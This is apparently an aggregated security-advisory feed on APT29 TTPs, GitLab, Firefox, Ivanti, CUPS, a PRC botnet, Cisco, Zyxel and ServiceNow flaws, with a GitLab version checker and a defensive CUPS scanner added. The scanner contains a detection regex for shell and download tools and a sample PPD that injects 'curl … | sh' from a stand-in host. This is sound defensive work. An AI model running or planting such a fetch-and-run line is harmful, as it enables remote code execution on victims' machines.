Recent bundles
Update on SVR Cyber Operations and Vulnerability Exploitation
2024-10-14T15:50:35 by Alexandre Dulaunoy
The Federal Bureau of Investigation (FBI), the National Security Agency (NSA), Cyber National Mission Force (CNMF), and the United Kingdom’s National Cyber Security Centre (NCSC-UK) are releasing this joint Cybersecurity Advisory (CSA) to highlight the tactics, techniques, and procedures (TTPs) employed by the Russian Federation’s Foreign Intelligence Service (SVR) in recent cyber operations and provide network defenders with information to help counter SVR cyber threats. Since at least 2021, Russian SVR cyber actors – also tracked as APT29, Midnight Blizzard (formerly Nobelium), Cozy Bear, and the Dukes – have consistently targeted US, European, and global entities in the defense, technology, and finance sectors to collect foreign intelligence and enable future cyber operations, including in support of Russia’s ongoing invasion of Ukraine since February 2022. Their operations continue to pose a global threat to government and private sector organizations.
The authoring agencies are releasing this CSA to warn network defenders that SVR cyber actors are highly capable of and interested in exploiting software vulnerabilities for initial access [T1190] and escalation of privileges [T1068]. Organizations should prioritize rapid patch deployment and keep software up to date. The SVR continues using TTPs such as spearphishing [T1566], password spraying [T1078], abuse of supply chain [T1195] and trusted relationships [T1199], custom and bespoke malware, cloud exploitation, and living-off-the-land techniques to gain initial access, escalate privileges, move laterally, maintain persistence in victim networks and cloud environments, and exfiltrate information. SVR actors often use The Onion Router (TOR) network, leased and compromised infrastructure, and proxies to obfuscate activity.
Ref: PDF - Update on SVR Cyber Operations and Vulnerability Exploitation
Related vulnerabilities: CVE-2023-40289, CVE-2023-42793, CVE-2023-24023, CVE-2023-45866, CVE-2022-40507, CVE-2021-27850, CVE-2023-37580, CVE-2023-20198, CVE-2023-38546, CVE-2023-40076, CVE-2023-35078, CVE-2021-41773, CVE-2023-29357, CVE-2023-5044, CVE-2023-4911, CVE-2023-6345, CVE-2023-40088, CVE-2018-13379, CVE-2023-4966, CVE-2023-36745, CVE-2023-38545, CVE-2023-24955, CVE-2021-42013, CVE-2023-40077
GitLab Critical Patch Release: 17.4.2, 17.3.5, 17.2.9 by Nikhil George
Today we are releasing versions 17.4.2, 17.3.5, 17.2.9 for GitLab Community Edition (CE) and Enterprise Edition (EE).
These versions contain important bug and security fixes, and we strongly recommend that all self-managed GitLab installations be upgraded to one of these versions immediately. GitLab.com is already running the patched version. GitLab Dedicated customers do not need to take action.
GitLab releases fixes for vulnerabilities in patch releases. There are two types of patch releases: scheduled releases, and ad-hoc critical patches for high-severity vulnerabilities. Scheduled releases are released twice a month on the second and fourth Wednesdays. For more information, you can visit our releases handbook and security FAQ. You can see all of GitLab release blog posts here.
For security fixes, the issues detailing each vulnerability are made public on our issue tracker 30 days after the release in which they were patched.
We are committed to ensuring all aspects of GitLab that are exposed to customers or that host customer data are held to the highest security standards. As part of maintaining good security hygiene, it is highly recommended that all customers upgrade to the latest patch release for their supported version. You can read more best practices in securing your GitLab instance in our blog post.
Recommended Action
We strongly recommend that all installations running a version affected by the issues described below are upgraded to the latest version as soon as possible.
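Before deciding how urgently to schedule the upgrade, it helps to map an instance's version onto the affected ranges the advisory lists for each issue. The script below is an added example, not GitLab's own code or tooling: it encodes the "starting from X prior to 17.2.9 / 17.3.5 / 17.4.2" ranges and the first affected version quoted for each CVE, and returns the CVE IDs that apply to a given version string (the string can be taken from the instance's authenticated `/api/v4/version` endpoint or the admin area). The `edition` parameter (to drop EE-only issues for CE instances) and the treatment of series newer than 17.4 as outside this advisory's scope are assumptions made for the example.

```python
"""Map a GitLab version string onto the ranges fixed by 17.4.2 / 17.3.5 / 17.2.9.

Added example, not GitLab's code. First-affected versions are those quoted in the
advisory text; the edition handling and the ">17.4 is out of scope" rule are assumptions.
"""
import re

# First affected version per CVE, as stated in the advisory.
FIRST_AFFECTED = {
    "CVE-2024-9164": (12, 5, 0),   # run pipelines on arbitrary branches (EE)
    "CVE-2024-8970": (11, 6, 0),   # trigger a pipeline as another user
    "CVE-2024-8977": (15, 10, 0),  # SSRF in Product Analytics Dashboard (EE)
    "CVE-2024-9631": (13, 6, 0),   # slow MR conflict diffs (DoS)
    "CVE-2024-6530": (17, 1, 0),   # HTML injection on the OAuth authorisation page
    "CVE-2024-9623": (8, 16, 0),   # deploy keys can push to an archived repository
    "CVE-2024-5005": (11, 4, 0),   # guests can read project templates via the API
    "CVE-2024-9596": (16, 6, 0),   # unauthenticated version disclosure (EE)
}
# Issues the advisory attributes to GitLab EE only (assumption: CE instances can skip them).
EE_ONLY = {"CVE-2024-9164", "CVE-2024-8977", "CVE-2024-9596"}

# Everything below 17.2.9 is fixed by 17.2.9; the 17.3 series by 17.3.5; 17.4 by 17.4.2.
# Series newer than 17.4 are not covered by this advisory (assumption: not flagged).
OLDEST_FIX = (17, 2, 9)
FIX_WINDOWS = (((17, 3, 0), (17, 3, 5)), ((17, 4, 0), (17, 4, 2)))


def parse_version(text):
    """Turn '17.3.4-ee' or 'v17.3.4' into (17, 3, 4); raise on anything else."""
    m = re.match(r"^\s*v?(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"unrecognised GitLab version: {text!r}")
    return tuple(int(x) for x in m.groups())


def in_unpatched_window(version):
    """True if `version` falls in one of the unpatched ranges named in the advisory."""
    if version < OLDEST_FIX:
        return True
    return any(lo <= version < hi for lo, hi in FIX_WINDOWS)


def affected_cves(version_text, edition="ee"):
    """Return the sorted CVE IDs from this patch release that apply to the instance."""
    version = parse_version(version_text)
    if not in_unpatched_window(version):
        return []
    hits = [
        cve for cve, first in FIRST_AFFECTED.items()
        if version >= first and (edition == "ee" or cve not in EE_ONLY)
    ]
    return sorted(hits)


if __name__ == "__main__":
    for sample in ("17.4.1-ee", "17.3.5-ee", "16.11.2-ce", "12.4.0"):
        edition = "ce" if sample.endswith("-ce") else "ee"
        print(sample, affected_cves(sample, edition))
```

The check is deliberately conservative: a version at or above the fixed release for its series returns an empty list, while anything older than 17.2.9 (including series that GitLab no longer maintains) is reported as affected for every issue whose first affected version it has reached.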
When no specific deployment type (omnibus, source code, helm chart, etc.) of a product is mentioned, this means all types are affected.
Security fixes
Table of security fixes
| Title | Severity |
|---|---|
| Run pipelines on arbitrary branches | Critical |
| An attacker can impersonate arbitrary user | High |
| SSRF in Analytics Dashboard | High |
| Viewing diffs of MR with conflicts can be slow | High |
| HTMLi in OAuth page | High |
| Deploy Keys can push changes to an archived repository | Medium |
| Guests can disclose project templates | Medium |
| GitLab instance version disclosed to unauthorized users | Low |
Run pipelines on arbitrary branches
An issue was discovered in GitLab EE affecting all versions starting from 12.5 prior to 17.2.9, starting from 17.3, prior to 17.3.5, and starting from 17.4 prior to 17.4.2, which allows running pipelines on arbitrary branches. This is a critical severity issue (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N, 9.6). It is now mitigated in the latest release and is assigned CVE-2024-9164.
Thanks pwnie for reporting this vulnerability through our HackerOne bug bounty program.
An attacker can impersonate arbitrary user
An issue was discovered in GitLab CE/EE affecting all versions starting from 11.6 prior to 17.2.9, starting from 17.3 prior to 17.3.5, and starting from 17.4 prior to 17.4.2, which allows an attacker to trigger a pipeline as another user under certain circumstances. This is a high severity issue (CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N, 8.2). It is now mitigated in the latest release and is assigned CVE-2024-8970.
Thanks yvvdwf for reporting this vulnerability through our HackerOne bug bounty program.
SSRF in Analytics Dashboard
An issue has been discovered in GitLab EE affecting all versions starting from 15.10 prior to 17.2.9, from 17.3 prior to 17.3.5, and from 17.4 prior to 17.4.2. Instances with Product Analytics Dashboard configured and enabled could be vulnerable to SSRF attacks. This is a high severity issue (CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N, 8.2). It is now mitigated in the latest release and is assigned CVE-2024-8977.
Thanks joaxcar for reporting this vulnerability through our HackerOne bug bounty program.
Viewing diffs of MR with conflicts can be slow
An issue was discovered in GitLab CE/EE affecting all versions starting from 13.6 prior to 17.2.9, starting from 17.3 prior to 17.3.5, and starting from 17.4 prior to 17.4.2, where viewing diffs of an MR with conflicts can be slow. This is a high severity issue (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H, 7.5). It is now mitigated in the latest release and is assigned CVE-2024-9631.
Thanks a92847865 for reporting this vulnerability through our HackerOne bug bounty program.
HTMLi in OAuth page
A cross-site scripting issue has been discovered in GitLab affecting all versions starting from 17.1 prior to 17.2.9, starting from 17.3 prior to 17.3.5, and starting from 17.4 prior to 17.4.2. When authorising a new application, the page can be made to render attacker-supplied HTML under specific circumstances. This is a high severity issue (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N, 7.3). It is now mitigated in the latest release and is assigned CVE-2024-6530.
Thanks joaxcar for reporting this vulnerability through our HackerOne bug bounty program.
Deploy Keys can push changes to an archived repository
An issue was discovered in GitLab CE/EE affecting all versions starting from 8.16 prior to 17.2.9, starting from 17.3 prior to 17.3.5, and starting from 17.4 prior to 17.4.2, which allows deploy keys to push to an archived repository. This is a medium severity issue (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N, 4.9). It is now mitigated in the latest release and is assigned CVE-2024-9623.
Thanks stevenorman for reporting this vulnerability.
Guests can disclose project templates
An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.4 prior to 17.2.9, starting from 17.3 prior to 17.3.5, and starting from 17.4 prior to 17.4.2. It was possible for guest users to disclose project templates using the API. This is a medium severity issue (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N, 4.3). It is now mitigated in the latest release and is assigned CVE-2024-5005.
Thanks js_noob for reporting this vulnerability through our HackerOne bug bounty program.
GitLab instance version disclosed to unauthorized users
An issue has been discovered in GitLab EE affecting all versions starting from 16.6 prior to 17.2.9, from 17.3 prior to 17.3.5, and from 17.4 prior to 17.4.2. It was possible for an unauthenticated attacker to determine the GitLab version number for a GitLab instance. This is a low severity issue (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N, 3.7). It is now mitigated in the latest release and is assigned CVE-2024-9596.
This issue was discovered internally by GitLab team member Paul Gascou-Vaillancourt.
Bug fixes
17.4.2
- Backport: fix: Specify an absolute directory for SCHEMA_VERSIONS_DIR to 17-4-stable
- Backport grpc-go v1.67.1 upgrade to 17.4
- Update expected vulnerability in enable_advanced_sast_spec.rb
- Skip multi-version upgrade job for stable branch MRs
- Backport 17.4 Fix label filter by name for search
- Restrict duo pro assignment email to duo pro for sm
- Drop project_id not null constraint ci_deleted_objects
- [Backport] Go-get: fix 401 error for unauthenticated requests
17.3.5
- Backport: fix: Specify an absolute directory for SCHEMA_VERSIONS_DIR to 17-3-stable
- Backport: fix: Allow non-root user to run the bundle-certificates script 17.3
- Skip multi-version upgrade job for stable branch MRs
- Ensure restricted visibility levels is an array - 17.3 backport
17.2.9
- Skip multi-version upgrade job for stable branch MRs
- Ensure restricted visibility levels is an array - 17.2 backport
Updating
To update GitLab, see the Update page. To update GitLab Runner, see the Updating the Runner page.
Receive Patch Notifications
To receive patch blog notifications delivered to your inbox, visit our contact us page. To receive release notifications via RSS, subscribe to our patch release RSS feed or our RSS feed for all releases.
We’re combining patch and security releases
This improvement in our release process matches the industry standard and will help GitLab users get information about security and bug fixes sooner; read the blog post here.
Related vulnerabilities: CVE-2024-5005, CVE-2024-9596, CVE-2024-8977, CVE-2024-9631, CVE-2024-6530, CVE-2024-9623, CVE-2024-8970, CVE-2024-9164
The vulnerability, tracked as CVE-2024-9680 and discovered by ESET researcher Damien Schaeffer, is a use-after-free in Firefox's Animation timelines.
"An attacker was able to achieve code execution in the content process by exploiting a use-after-free in Animation timelines. We have had reports of this vulnerability being exploited in the wild."
A patch has been made available on Tue, 08 Oct 2024 16:25:12 +0000.
Related vulnerabilities: CVE-2024-9680
Ivanti original security advisory
"At Ivanti, our top priority is upholding our commitment to deliver and maintain secure products for our customers." Our vulnerability management program is designed to enable us to find, fix and disclose vulnerabilities in collaboration with the broader security ecosystem, and communicate responsibly and transparently with customers.
In recent months, we have intensified our internal scanning, manual exploitation and testing capabilities, and have additionally made improvements to our responsible disclosure process so that we can promptly discover and address potential issues.
Ivanti is making a large investment in Secure by Design across our organization and signed the CISA Secure by Design pledge in May. You can follow along with our progress here.
Today, fixes have been released for the following Ivanti solutions: Ivanti Endpoint Manager Mobile (EPMM), Ivanti Cloud Service Application (CSA), Ivanti Velocity License Server, Ivanti Connect Secure and Policy Secure, and Ivanti Avalanche.
It is important for customers to know:
We are aware of a limited number of customers running CSA 4.6 patch 518 and prior who have been exploited when CVE-2024-9379 or CVE-2024-9380 are chained with CVE-2024-8963. We have not observed these vulnerabilities being exploited in any version of CSA 5.0.
We have no evidence of any other vulnerabilities being exploited in the wild.
These vulnerabilities do not impact any other Ivanti products or solutions.
More information on these vulnerabilities and detailed instructions on how to remediate the issues can be found in these Security Advisories:
- Ivanti EPMM
- Ivanti CSA
- Ivanti Velocity License Server
- Ivanti Avalanche
- Ivanti Connect Secure/Policy Secure
Our Support team is always available to help customers and partners should they have any questions. Cases can be logged via the Success portal (login credentials required).
Want to stay up to date on Ivanti Security Advisories? Paste https://www.ivanti.com/blog/topics/security-advisory/rss into your preferred RSS reader / functionality in your email program.
Original source: https://www.ivanti.com/blog/october-2024-security-update
Counter analysis from @screaminggoat@infosec.exchange
~~~
Ivanti Security Advisory: Ivanti CSA (Cloud Services Application) (CVE-2024-9379, CVE-2024-9380, CVE-2024-9381)
Very sneaky of Ivanti to quietly update the security advisory without a changelog: They removed CVE-2024-9381 (CVSSv3: 7.2 high) Path traversal in Ivanti CSA before version 5.0.2 from the exploitation announcement:
~~~
Original source: https://social.circl.lu/@screaminggoat@infosec.exchange/113278926244627512
Related vulnerabilities: CVE-2024-9379, CVE-2024-9380, CVE-2024-8963, CVE-2024-9381
Following the initial research published by evilsocket.net in Attacking UNIX Systems via CUPS, Part I.
OpenPrinting Vendor Fixes
- CVE-2024-47176: cups-browsed binds on UDP INADDR_ANY:631, trusting any packet from any source to trigger a get-printer-attributes IPP request to an attacker-controlled URL (GHSA)
- CVE-2024-47076: cfGetPrinterAttributes5() (libcupsfilters 2.x) and get_printer_attributes5() (cups-filters 1.x) do not validate or sanitize the IPP attributes returned from an IPP server, providing attacker-controlled data to the rest of the CUPS system (GHSA)
- CVE-2024-47175: In libppd, ppdCreatePPDFromIPP2() does not validate or sanitize the IPP attributes when writing them to the PPD file, allowing the injection of attacker-controlled data into the resulting PPD (GHSA)
- CVE-2024-47177: cups-filters <= 2.0.1 foomatic-rip allows arbitrary command execution via the FoomaticRIPCommandLine PPD parameter (GHSA)
The already available fixes are sufficient to prevent the exploit.
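As an added, defensive example (not code from evilsocket's write-up or from OpenPrinting), the script below does two local checks that follow directly from the chain above. It scans PPD text for the FoomaticRIPCommandLine keyword, the sink of CVE-2024-47177, together with the cupsFilter/cupsFilter2 keywords that name the filter program CUPS will run, and flags values that look like a chained shell command; and it reads cups-browsed.conf text to tell whether the legacy "cups" browsing protocol, which is what makes cups-browsed bind UDP 631 (CVE-2024-47176), is enabled. The metacharacter heuristic, the "dnssd cups" default assumed when the directive is absent, and the sample PPD and config text are all constructed assumptions for the example, not taken from the advisories.

```python
"""Local checks for the OpenPrinting CUPS chain (CVE-2024-47176, -47076, -47175, -47177).

Added example, not code from evilsocket's write-up or from OpenPrinting. The heuristics
and the sample PPD/config text below are constructed for illustration.
"""
import re

# PPD keywords whose value is ultimately executed: FoomaticRIPCommandLine is the sink named
# in CVE-2024-47177; cupsFilter/cupsFilter2 name the filter program CUPS will run.
EXEC_KEYWORDS = ("FoomaticRIPCommandLine", "cupsFilter", "cupsFilter2")

# Heuristic (assumption): a legitimate RIP command line may pipe (gs ... | driver), but it
# has no reason to chain commands, spawn a shell, or fetch anything from the network.
SUSPICIOUS = re.compile(
    r";|`|\$\(|&&|\|\||>\s*/|\b(?:curl|wget|nc|ncat|bash|sh|python\d?|perl)\b"
)

# A PPD main keyword line: *Keyword: "value"  (the quotes are optional in the grammar).
PPD_LINE = re.compile(r'^\*(\w+)\s*:\s*"?(.*?)"?\s*$')


def ppd_command_findings(ppd_text):
    """Return (keyword, value) pairs for executable PPD keywords whose value looks hostile."""
    findings = []
    for line in ppd_text.splitlines():
        m = PPD_LINE.match(line)
        if not m:
            continue
        keyword, value = m.group(1), m.group(2)
        if keyword in EXEC_KEYWORDS and SUSPICIOUS.search(value):
            findings.append((keyword, value))
    return findings


def browsed_conf_risk(conf_text):
    """Report the effective remote browse protocols from cups-browsed.conf text.

    cups-browsed listens on UDP 631 only when the legacy "cups" protocol is among the
    remote protocols. BrowseProtocols sets local and remote at once; an explicit
    BrowseRemoteProtocols takes precedence.
    """
    remote = None
    both = None
    for raw in conf_text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and blank lines
        if not line:
            continue
        parts = line.split(None, 1)
        key = parts[0].lower()
        values = parts[1].lower().split() if len(parts) > 1 else []
        if key == "browseremoteprotocols":
            remote = values
        elif key == "browseprotocols":
            both = values
    effective = remote if remote is not None else both
    defaulted = effective is None
    if defaulted:
        # Assumption: the pre-fix upstream default of "dnssd cups" applies when unset.
        effective = ["dnssd", "cups"]
    return {
        "protocols": effective,
        "defaulted": defaulted,
        "udp631_listener": "cups" in effective,
    }


# Constructed samples (not real vendor files).
BENIGN_PPD = """*PPD-Adobe: "4.3"
*ModelName: "Generic PostScript"
*cupsFilter2: "application/pdf application/vnd.cups-postscript 0 foomatic-rip"
*FoomaticRIPCommandLine: "gs -q -dBATCH -dSAFER -sDEVICE=ljet4 -sOutputFile=- - | pnmtops"
"""

HOSTILE_PPD = BENIGN_PPD + (
    '*FoomaticRIPCommandLine: "gs -q -dBATCH -sOutputFile=- - ; '
    'curl http://192.0.2.10/p | sh"\n'
)

if __name__ == "__main__":
    print("benign :", ppd_command_findings(BENIGN_PPD))
    print("hostile:", ppd_command_findings(HOSTILE_PPD))
    print(browsed_conf_risk("BrowseRemoteProtocols dnssd\n"))
    print(browsed_conf_risk("# nothing set, defaults apply\n"))
```

The PPD scan is a triage aid, not a proof of compromise: it keeps pipelines (which real Foomatic command lines use) and only flags command chaining, subshells, redirection into the filesystem and common download or shell binaries, so a hit in /etc/cups/ppd or a freshly auto-discovered printer is a reason to look at the file, and a clean result is not a guarantee.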
Additional vulnerabilities
- CVE-2024-47850 - CUPS cups-browsed before 2.5b1 will send an HTTP POST request to an arbitrary destination and port in response to a single IPP UDP packet requesting a printer to be added, a different vulnerability than CVE-2024-47176. (The request is meant to probe the new printer but can be used to create DDoS amplification attacks.)
Additional reference
- You're probably not vulnerable to the CUPS CVE
- OpenPrinting OpenPrinting News Flash - cups-browsed Remote Code Execution vulnerability
- Debian CVE-2024-47176
- Ubuntu USN-7042-1: cups-browsed vulnerability
- RedHat Red Hat’s response to OpenPrinting CUPS vulnerabilities: CVE-2024-47076, CVE-2024-47175, CVE-2024-47176 and CVE-2024-47177
Related vulnerabilities: CVE-2024-47076, CVE-2024-47850, GHSA-RJ88-6MR5-RCW8, GHSA-7XFX-47QG-GRP6, CVE-2024-47175, GHSA-P9RH-JXMQ-GQ47, CVE-2024-47177, GHSA-W63J-6G73-WMG5, CVE-2024-47176
TL;DR: All versions of Red Hat Enterprise Linux (RHEL) are affected by CVE-2024-47076, CVE-2024-47175, CVE-2024-47176 and CVE-2024-47177, but are not vulnerable in their default configurations.
Red Hat has been made aware of a group of vulnerabilities (CVE-2024-47076, CVE-2024-47175, CVE-2024-47176 and CVE-2024-47177) within OpenPrinting CUPS, an open source printing system that is prevalent in most modern Linux distributions, including RHEL. Specifically, CUPS provides tools to manage, discover and share printers for Linux distributions. By chaining this group of vulnerabilities together, an attacker could potentially achieve remote code execution which could then lead to theft of sensitive data and/or damage to critical production systems.
Red Hat rates these issues with a severity impact of Important. While all versions of RHEL are affected, it is important to note that affected packages are not vulnerable in their default configuration. At this time, there are four CVEs assigned to these vulnerabilities, but the exact number is still being coordinated with the upstream community and the researcher who discovered the problem.
Related vulnerabilities: CVE-2024-47076, CVE-2024-47176, CVE-2024-47177, CVE-2024-47175
The Federal Bureau of Investigation (FBI), Cyber National Mission Force (CNMF), and National Security Agency (NSA) assess that People’s Republic of China (PRC)-linked cyber actors have compromised thousands of Internet-connected devices, including small office/home office (SOHO) routers, firewalls, network-attached storage (NAS) and Internet of Things (IoT) devices with the goal of creating a network of compromised nodes (a “botnet”) positioned for malicious activity. The actors may then use the botnet as a proxy to conceal their identities while deploying distributed denial of service (DDoS) attacks or compromising targeted U.S. networks. Integrity Technology Group, a PRC-based company, has controlled and managed a botnet active since mid-2021. The botnet has regularly maintained between tens and hundreds of thousands of compromised devices. As of June 2024, the botnet consisted of over 260,000 devices. Victim devices that are part of the botnet have been observed in North America, South America, Europe, Africa, Southeast Asia and Australia. While devices aged beyond their end-of-life dates are known to be more vulnerable to intrusion, many of the compromised devices in the Integrity Tech-controlled botnet are likely still supported by their respective vendors. FBI, CNMF, NSA, and allied partners are releasing this Joint Cyber Security Advisory to highlight the threat posed by these actors and their botnet activity and to encourage exposed device vendors, owners, and operators to update and secure their devices from being compromised and joining the botnet. Network defenders are advised to follow the guidance in the mitigations section to protect against the PRC-linked cyber actors’ botnet activity. Cyber security companies can also leverage the information in this advisory to assist with identifying malicious activity and reducing the number of devices present in botnets worldwide. For additional information, see the U.S. Department of Justice (DOJ) press release.
https://media.defense.gov/2024/Sep/18/2003547016/-1/-1/0/CSA-PRC-LINKED-ACTORS-BOTNET.PDF
Related vulnerabilities: CVE-2024-5217, CVE-2024-4577, CVE-2023-47218, CVE-2024-29269, CVE-2023-50386, CVE-2024-29973, CVE-2024-21762
Two critical vulnerabilities in Cisco's Smart Licensing Utility allow remote, unauthenticated attackers to gain privileges or access sensitive data.
Vulnerabilities:
- CVE-2024-20439 (CVSS: 9.8): An undocumented static admin account can be exploited to access affected systems.
- CVE-2024-20440 (CVSS: 7.5): An overly verbose debug log can be exploited via a crafted HTTP request, exposing API credentials.
⚠️ These issues are only exploitable if the licensing utility is actively running. Cisco strongly advises updating systems to mitigate these threats.
Related vulnerabilities: CVE-2024-20440, CVE-2024-20439
Zyxel security advisory for multiple vulnerabilities in firewalls
2024-09-05T08:37:49 by Jean-Louis Huynen
Zyxel has released patches addressing multiple vulnerabilities in some firewall versions. Users are advised to install the patches for optimal protection.
| Firewall series | CVE-2024-6343 | CVE-2024-7203 | CVE-2024-42057 | CVE-2024-42058 | CVE-2024-42059 | CVE-2024-42060 | CVE-2024-42061 | Patch availability |
|---|---|---|---|---|---|---|---|---|
| ATP | ZLD V4.32 to V5.38 | ZLD V4.60 to V5.38 | ZLD V4.32 to V5.38 | ZLD V4.32 to V5.38 | ZLD V5.00 to V5.38 | ZLD V4.32 to V5.38 | ZLD V4.32 to V5.38 | ZLD V5.39 |
| USG FLEX | ZLD V4.50 to V5.38 | ZLD V4.60 to V5.38 | ZLD V4.50 to V5.38 | ZLD V4.50 to V5.38 | ZLD V5.00 to V5.38 | ZLD V4.50 to V5.38 | ZLD V4.50 to V5.38 | ZLD V5.39 |
| USG FLEX 50(W)/USG20(W)-VPN | ZLD V4.16 to V5.38 | Not affected | ZLD V4.16 to V5.38 | ZLD V4.20 to V5.38 | ZLD V5.00 to V5.38 | ZLD V4.16 to V5.38 | ZLD V4.16 to V5.38 | ZLD V5.39 |
Related vulnerabilities: CVE-2024-6343, CVE-2024-7203, CVE-2024-42057, CVE-2024-42058, CVE-2024-42059, CVE-2024-42060, CVE-2024-42061
- KB1648313 CVE-2024-5217 - Incomplete Input Validation in GlideExpression Script 2024-07-10
- KB1648312 CVE-2024-5178 - Incomplete Input Validation in SecurelyAccess API 2024-07-10
- KB1645154 CVE-2024-4879 - Jelly Template Injection Vulnerability in ServiceNow UI Macros 2024-07-10
CVE-2024-4879 appears to be the most serious of the three, as it allows RCE for unauthenticated users.
ref: https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB1226057
Related vulnerabilities: CVE-2024-5217, CVE-2024-5178, CVE-2024-4879